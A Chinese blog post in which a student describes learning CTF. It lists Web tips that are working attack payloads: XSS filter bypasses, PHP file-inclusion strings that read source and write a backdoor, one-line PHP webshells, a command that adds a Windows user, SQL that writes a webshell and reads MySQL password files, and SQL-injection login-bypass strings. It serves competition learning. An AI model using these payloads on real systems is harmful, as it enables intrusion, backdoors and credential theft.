前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >从零开始的CTF学习过程

从零开始的CTF学习过程

作者头像
安恒网络空间安全讲武堂
发布2018-08-17 17:47:44
1.4K0
发布2018-08-17 17:47:44
举报

在上大学之前,我是从来没有学习过任何编程知识的。不过我喜欢计算机,甚是喜欢这折腾的过程,从刚开始的学习使用、玩游戏、找外挂辅助,到后来的维修计算机。

上大学后,最先接触的编程语言是C。我自认为我学的是信息安全专业,只懂一门语言肯定是不够的。于是乎,我开始自学python及web前端和后端。不过在勉强入门后,有些迷茫,不知道怎么入门信息安全,感觉网上的教程都只是教人如何敲代码的而已。

不过我很幸运,遇到了一位老师,给我们提供了学习CTF(在此之前我完全不了解CTF)的入门资源及机会,让我初步入门CTF。此后,我们学校的学生组成了一个CTF队伍,在网上拼命地打比赛。虽然我们的战绩不太理想,但我们的排名也一次比一次高,我们偶尔也会尝到做出题的喜悦(平时基本是做不出题的),这是一个从零到一的过程。甚至,还曾参加过CTF线下赛。同时,我们也积累了很多CTF“作案”工具。

我对CTF中的Web和Cryptology较为感兴趣。就Cryptology而言, RSA密码是我最为感兴趣的,我甚至尝试过把质数都提前生成下来,中间还曾多次因为代码质量过低导致系统崩溃。虽然后来代码质量问题解决了,不过在生成了几十G的质数表后我就没继续了,毕竟效率太低了且时间成本太高了。

CTF心得

一、Web

  1. XSS 1. body标签绕过:<body onload=alert(1)> 2. 双写绕过:<sc<script>ript>alert(1)</script> 3. 大小写绕过:<ScRipt>alert(1)</script> 4. img标签绕过:<img src=xonError=alert(1)>
  2. web安全文件包含漏洞 获取源码:http://xxx.com /index.php?file=php://filter/read=convert.base64-encode/resource=index.php 写后门:http://xxx.com/index.php?file=php://input <?fputs(fopen("shell.php","w"),"<?php eval($_post['xxx'];?>")?>
  3. web安全文件上传漏洞 copy 普通图片.png/b+一句话木马.php 1.php 一句话木马: 1.<?php eval($_POST[a]);?> 2.<?php @eval(@$_REQUEST['a']);?>
  4. web安全命令执行漏洞 net user test 123456 /add echo ^<?php eval($_POST[a]);?^> > a.php
  5. 数据库 查看当前数据库用户的权限 show GRANTS for CURRENT_USER(); 写入一句话木马文件 select '<?php @eval(&_POST[a]);?>' INTO OUTFILE '/var/www/html/errors.php'; 查看当前数据库存放路径 SELECT @@datadir; 把user.MYD文件中的数据库用户的密码信息导入到一张表中 load data infile "/var/lib/mysql/mysql/user.MYD" into TABLE test.q fields terminated by ' ' LINES TERMINATED BY '\0'
  6. SQL万能密码
  7. 1. "or"a"="a 2. '.).or.('.a.'='.a 3. or 1=1-- 4. 'or 1=1-- 5. a'or' 1=1-- 6. "or 1=1-- 7. 'or.'a.'='a 8. "or"="a'='a 9. 'or"=' 10. 'or'='or'
  8. SQL利用语句与函数解释 1. 1' 2. 1'or 1=1 order by 1 # 3. 1'or 1=2 union select 1,user from mysql.user

二、Cryptology

  1. 古典密码 百度、谷歌下基本都可以解决。
  2. 哈希密码 哈希拓展攻击、哈希碰撞……
  3. RSA 维纳、爆破、yafu……
  4. 其他 遇到新的不懂的,就百度、谷歌看看有没有类似的加密方式,触类旁通。

三、MISC

这个太杂了,反而不知道写什么好。当你拿到一个文件时,binwalk下,看看是不是单纯的一个文件。然后感觉该怎么办就怎么办……

四、RE,PWN

有文件时就本地调试或反编译,看有没有溢出、释放后引用、double free等漏洞。然后就开始尝试写poc吧。

另外,在极少数情况下,这些题还能够使用类似CE这种修改内存的工具解决。

最后,附上学习CTF的笔记链接:http://note.youdao.com/noteshare?id=72df985b71559a1103fc8558620d8488

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-08-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 恒星EDU 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档